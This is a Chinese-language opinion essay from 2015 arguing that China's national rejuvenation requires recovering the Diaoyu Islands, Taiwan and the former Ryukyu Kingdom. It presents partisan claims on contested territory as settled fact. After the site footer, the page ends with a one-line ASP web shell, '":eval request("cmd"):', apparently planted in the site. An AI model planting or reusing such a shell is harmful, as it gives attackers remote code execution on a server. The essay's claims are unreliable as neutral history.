保钓理论

实现中国梦的目标自然包括钓鱼岛等问题的根本解决

时间:2015-3-26 21:41:12  作者:李景科  来源:  查看:77  评论:0
内容摘要:党的十八大以来,习近平为首的党中央,将中国人民百多年来的民族复兴的梦想,终于作为在两个一百年到来的时刻要实现的目标--实现中华民族的伟大复兴--中国梦。时间还是很紧迫的,因为最多还有34年时间。到中国共产党成立100年时全面建成小康社会的目标是1921年+100年=2021年,到...
党的十八大以来,习近平为首的党中央,将中国人民百多年来的民族复兴的梦想,终于作为在两个一百年到来的时刻要实现的目标--实现中华民族的伟大复兴--中国梦。时间还是很紧迫的,因为最多还有34年时间。到中国共产党成立100年时全面建成小康社会的目标是1921+100=2021年,到新中国成立100年时中华民族伟大复兴的实现是1949+100=2049年。

中国梦的本质是什么呢?习近平总书记说:“中国梦”归根到底是人民的梦。他说:“实现中华民族伟大复兴的中国梦,就是要实现国家富强、民族振兴、人民幸福。”是国家统一、民族团结的梦。国家统一是实现中华民族伟大复兴不可或缺的历史前提和基本保证。中华民族五千年来自强不息的发展史,也是各民族共同推动和维护国家统一的奋斗史。统一的多民族国家的建立和发展,才能成为中华文明繁荣兴旺、延绵不绝的基础。

在落实国家民族同一问题上,包括台湾,也包括钓鱼岛,进而,只要原琉球国人民选择回归祖国中国,就必然包括原琉球群岛。这是第二次世界大战后废除强加给中国的不平等条约后,日本和美国还没有交还中国的近现代历史遗留问题。在现代,是必须解决的问题。只有这样,才是对抗日战争胜利70周年最好的纪念。

台湾问题与已经回归中国的港澳一样适用于一国两制的方针。而琉球国作为自古以来中国的属国,在日本侵占的时候,是中国藩王制度。因此,应在藩王的体制和现代民主制度的有机结合下回归中国。这在1945年就有了准备迎接琉球回归祖国的琉球革命同志会和琉球人民协会组织,也拥戴有原琉球国中山王的尚氏后裔做代表。在如何选择独立或回归中国后的琉球社会体制上,不能同于港澳,也不能同于台湾,可能有第三种社会制度,就是根据原琉球国人民拥戴的原琉球藩王王族的后裔为代表。这就涉及到国家统一的多样化,有一国两制,也可以有一国三制。

这是目前在学术上,亟需尽快选择和论证的。由于琉球问题,目前已经复杂化,必须通过与现琉球独立组织充分合作,在联合国的层面上对日本和美国进行正式交涉。而解决琉球和钓鱼岛问题,也才是真正体现了中国国家和民族的统一。
相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):